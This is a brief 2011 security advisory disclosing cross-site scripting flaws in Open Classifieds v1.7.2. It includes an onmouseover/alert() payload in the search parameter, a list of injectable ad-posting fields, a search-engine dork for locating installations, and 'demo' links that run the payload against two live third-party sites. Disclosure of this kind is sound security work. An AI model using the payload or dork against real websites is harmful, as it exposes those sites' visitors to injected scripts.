---------------------------------------------------------------------
[+] Title              :  Open Classifieds v1.7.2 XSS Vulnerability
[+] Affected Version   :  v1.7.2
[+] Software Link      :  http://open-classifieds.com/
[+] Tested on          :  Windows 7 <Firefox>
[+] Date               :  23/08/2011
[+] Dork               :  “inurl:/publish-a-new-ad.htm”
[+] Category           :  Webapps
[+] Severity           :  Medium
[+] Author             :  Yassin Aboukir <01Xp01|At|Gmail.com
[+] Site               :  http://www.yaboukir.com
----------------------------------------------------------------------
[+] About the software:
Open Classifieds, is a free open source script for classifieds, advertisements or listings. This web application is developed to be fast, light, secure and SEO friendly. Template enabled and easy to administrate. Some features: Friendly URLs, Cache, Captcha, MySql+PHP+GPL.

[+] Description :
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications that enables attackers to inject client-side
script into web pages viewed by other users. A cross-site scripting
vulnerability may be used by attackers to bypass access controls such as the
same origin policy.

[+] How that can be exploited :

# –
http://localhost/oc172/?s=”+onmouseover=alert(00000)+
Move the mouse cursor to the search form, then an alert window will show up.

# –
1- Go to :  http://localhost/publish-a-new-ad.htm
2- name & email & place & price & title are vulnerable to XSS, so that the attacker may inject malicious scripts.


[+] Fix :  upgrade to last release.

[+] Demos           : 
http://www.thatdamnedbike.com/oc172/?s="+onmouseover=alert(00000)+
http://www.estudiowebcreativo.com/oc172/?s="+onmouseover=alert(00000)+